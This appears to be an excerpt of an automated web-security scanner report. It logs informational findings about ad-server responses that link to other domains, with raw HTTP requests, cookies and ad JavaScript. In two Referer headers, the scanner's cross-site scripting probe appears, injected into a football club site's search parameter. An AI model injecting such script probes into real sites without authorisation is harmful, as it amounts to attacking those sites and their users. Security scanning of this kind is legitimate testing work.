<noscript><iframe id="4e3c3f8146bae" name="4e3c3f8146bae" src="http://psa-d.openx.com/w/1.0/afr?auid=34589&cb=

1317600482_HERE" frameborder="0" scrolling="no" width="300" height="250"><a href="http://ad.yieldmanager.com/clk?3,eAGlTUFugzAQfA03ZNlgKBHqwQRRocaokUgRvSBjOyUlYGpoQ3l9nRLlA12tdmdGs7PIDZHPOOaMeRB6kgUwRK7DH1AtfAFtGIYhdiDGgeNvsD2mkSAxginZFtzfk7-KN.HzisyMA7JPV.YSEHCJAcBK08sqfdI
...[SNIP]...
WipUWJyqVF9JZj7h9tu5mmwXKJ5SSmBZg0E3IGapD9DLjqjMiOGgyNMSVaHrUcG8uNMbQcf1G9PAnDfA9dOa8NPvWj1FOlWS9UV.VfXS111UgtjeGsuHH8AgBrc00=,http://psa-

d.openx.com/w/1.0/rc?cs=4e3c3f8146bae&cb=1317600482_HERE" ><img src="http://psa-d.openx.com/w/1.0/ai?

auid=34589&cs=4e3c3f8146bae&cb=1317600482_HERE" border="0" alt=""></a>
...[SNIP]...
19.87. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /imp?anmember=514&anprice=&Z=728x90&s=1722409&r=1&_salt=2008914531&u=http%3A%2F%2Fwww.igougo.com%2Fabout%2F&u=http://www.igougo.com/about/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:52:58 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0158.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:52:58 GMT
Pragma: no-cache
Content-Length: 383
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

// PubMatic ad tag (iFrame wrapped) : igougo_728X90_ATF | http://www.igougo.com | 728 x 90 Leaderboard | Audience Science PCI -->
document.write('<iframe width="728" scrolling="no" height="90" frameborder="0" src="http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21557/559/adtag.html" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" ></iframe>
...[SNIP]...
19.88. http://ad.yieldmanager.com/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /imp?anmember=514&anprice=&Z=300x250&s=1722409&r=1&_salt=1348403289&u=http%3A%2F%2Fwww.igougo.com%2Fabout%2F&u=http://www.igougo.com/about/ HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/about/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:04 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0343.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:04 GMT
Pragma: no-cache
Content-Length: 392
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

// PubMatic ad tag (iFrame wrapped) : igougo_300X250_ATF | http://www.igougo.com | 300 x 250 Medium Rectangle | Audience Science PCI -->
document.write('<iframe width="300" scrolling="no" height="250" frameborder="0" src="http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" ></iframe>
...[SNIP]...
19.89. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1399334Q81720110831160016&flash=10&time=0|18:49|-5&redir=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~538936~3448~59764~134043~106934~3~345~25~premierleague.com~2~8~1~0~2~1~-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^~19~2~5ZvoQhA3FQCr~PpAVCxNh2PJr~1~1~1~~http%3A%2F%2Fbh.contextweb.com%2Fbh%2Fset.aspx%3Faction%3Dadd%26advid%3D3448%26token%3DTTCL1%26rurl%3D$CTURL$&data=345&r=0.26698742574080825 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><object id='prfls59AE0400D582DB2C030A1BD000770100' name='prfls59AE0400D582DB2C030A1BD000770100' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0 width='300' height='250' style='width:300px;height:250px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/ToyoTires/894167/ProxesSweeps_300x250_Flash_r01.swf?PRCampID=41405&PRPubID=cntxtwb&PRAdSize=300x250&PRFormat=FL&PRAd=151613
...[SNIP]...
19.90. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599889542 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=300 height=250";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812308" name="AT_FLASHO2812308" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.91. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C327%7C2812309%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599329835 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
_left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=468 height=60";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812309" name="AT_FLASHO2812309" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.92. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C327%7C2812326%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599377532 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Players/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
_left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=468 height=60";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2812326" name="AT_FLASHO2812326" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.93. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599390602;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713St1Sz168Sq100173284V0Id3.gif" border=0 alt=" " width="120" height="600"></a>
...[SNIP]...
19.94. http://adserver.adtech.de/addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C512%7C2042949%7C0%7C2384%7CADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick= HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19421

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=660 height=142";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2046906" name="AT_FLASHO2046906" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.95. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C999%7C3106021%7C0%7C168%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=578;misc=1317599931265 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75}
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19174

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=120 height=600";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO3106021" name="AT_FLASHO3106021" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.96. http://adserver.adtech.de/addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C999%7C3173523%7C0%7C477%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=261;misc=1317599777599 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 487

document.write('<a href="http://adserver.adtech.de/?adlink|999|3173523|0|477|AdId=6814195;BnId=3;itime=599780442;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/499/Ad6814195St1Sz477Sq101161089V0Id3.gif" border=0 alt=" " width="150" height="180"></a>
...[SNIP]...
19.97. http://adserver.adtech.de/addyn|3.0|512|2042949|0|2384|ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|512|2042949|0|2384|ADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn|3.0|512|2042949|0|2384|ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;misc=[timestamp];rdclick= HTTP/1.1
Host: adserver.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19421

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
left+'px;'+(!AT_FAKEPOPUP_start_opened?"display:none;":"")+'">';
}
if (ShockMode && AT_FLASH){
if (AT_EXPANDABLE && AT_EXPANDABLE !='false') AT_WIDTH_HEIGHT = "width=660 height=142";
adtech_flashinc+='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash2/cabs/swflash.cab#version=5,0,0,0" id="AT_FLASHO2046906" name="AT_FLASHO2046906" '+AT_WIDTH_HEIGHT+'>';
adtech_flashinc+='<param name=movie va'+'lue="'+AT_FLASH+ AT_VARSTRING +'&CURRENTDOMAIN='+AT_CURRENTDOMAIN+ '">
...[SNIP]...
19.98. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?l=24038&sz=728x90&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D728x90%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26adloc%3DNA%26random%3D771852%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=876971 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7223935ceaae2e8049f67e6c582a; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:01 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:728px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348532/direct/01?click=http:/
...[SNIP]...
<div style="z-index:2147483647; position:absolute; right:0px; top:0px; background:transparent; opacity:0.8; filter:alpha(opacity=80);"><a href="http://specificmedia.com/sites/privacy/?cid=178619&bid=1058368&lid=24038" target="_blank"><img src="http://cache.specificmedia.com/otherassets/ad_options_icon.png" style="border-style:none"></a></div></div>');
